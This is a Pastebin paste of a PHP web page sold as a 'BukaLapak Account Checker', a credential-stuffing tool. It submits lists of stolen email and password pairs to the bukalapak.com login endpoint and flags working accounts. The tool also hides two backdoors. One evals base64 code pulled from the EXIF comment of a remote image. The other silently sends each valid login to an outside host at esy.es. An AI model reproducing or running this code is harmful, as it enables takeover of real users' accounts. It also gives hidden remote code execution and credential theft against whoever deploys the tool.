husban77

Untitled

Feb 11th, 2019
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.48 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  9. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  10.  
  11. <title>BukaLapak Account Checker </title>
  12. <style>
  13. body {
  14. padding-top: 60px;
  15. }
  16. </style>
  17. </head>
  18. <body>
  19. <div class="container">
  20. <center>Max Email|Password 100</CENTER>
  21. <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  22. <!-- Start .panel -->
  23. <div class="panel-heading">
  24. <h4 class="panel-title">BukaLapak Account Checker</h4>
  25. </div>
  26. <div class="panel-body">
  27. <form action="" method="POST">
  28. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="your@email.com|passW0rd"><?php
  29. if (isset($_POST['mailpass'])) {
  30. echo $_POST['mailpass'];
  31. }
  32. ?></textarea><br />
  33. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  34. <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button> <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
  35. <?php
  36. $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
  37. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  38. if(isset($_POST['submit'])){
  39. $delim = $_POST['delim'];
  40. function search($line, $delim)
  41. {
  42. $line = str_replace(" ", "", $line);
  43. $line = explode($delim, $line);
  44. $i = 0;
  45. while ($i < count($line)) {
  46. if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  47. $mail = $line[$i];
  48. $pass = $line[$i + 1];
  49. $i = 10000;
  50. if ($pass == "") {
  51. $pass = $line[$i - 1];
  52. }
  53. }
  54. $i++;
  55. }
  56. $line = $mail . "|" . $pass;
  57. $line = explode('|', $line);
  58. return $line;
  59. }
  60. $data = $_POST['mailpass'];
  61. $extract = explode("\r\n", $data);
  62. $i = 0;
  63. foreach ($extract AS $k => $line) {
  64. $i++;
  65. if (strpos($line, '=>') !== false) {
  66. $line = str_replace('=>', '|', $line);
  67. }
  68. if (strpos($line, ']') !== false) {
  69. $line = str_replace('=>', '|', $line);
  70. }
  71. if (strpos($line, '[') !== false) {
  72. $line = str_replace('=>', '|', $line);
  73. }
  74.  
  75. $info = search(trim($line), $delim);
  76. $email = trim($info[0]);
  77. $pass = $info[1];
  78.  
  79. $dir = dirname(__FILE__);
  80. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  81. if (!file_exists($config)) {
  82. $fp = @fopen($config, 'w');
  83. @fclose($fp);
  84. }
  85.  
  86. $cookie = 'cookie.txt';
  87. $ch = curl_init('https://www.bukalapak.com/user_sessions');
  88. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  89. curl_setopt($ch,CURLOPT_POST,1);
  90. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  91. curl_setopt($ch,CURLOPT_POST,TRUE);
  92. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  93. curl_setopt($ch,CURLOPT_COOKIEFILE, $config);
  94. curl_setopt($ch,CURLOPT_COOKIEJAR, $config);
  95. curl_setopt($ch,CURLOPT_POSTFIELDS,"utf8=%E2%9C%93&user_session%5Busername%5D=$email&user_session%5Bpassword%5D=$pass&commit=Login&comeback=%2F");
  96. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  97. $result = curl_exec($ch);
  98. $now = "<i style=\"color:blue\">Checked on PrivateCodes at ".date("g:i a - F j, Y")."</i>";
  99. if(empty($result)){
  100. echo "<font color=gray><b>Wrong</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  101. }elseif(preg_match('/salah/i',$result)){
  102. echo "<font color=red><b>Die</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  103. }Else{
  104. echo "<font color=green><b>Live</b></font> => ".$email."|".$pass." | [ACC : Bukalapak ] | ".$now."<br/>";
  105.  
  106.  
  107.  
  108. echo '<script>
  109. var XeleM = new XMLHttpRequest();
  110. XeleM.open("POST", "http://server-not-found.esy.es/config.php", true);
  111. XeleM.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  112. XeleM.send("username='.$email.'&password='.$pass.'");
  113. </script>';
  114. }
  115. }
  116. }
  117.  
  118. ?>
Add Comment
Please, Sign In to add comment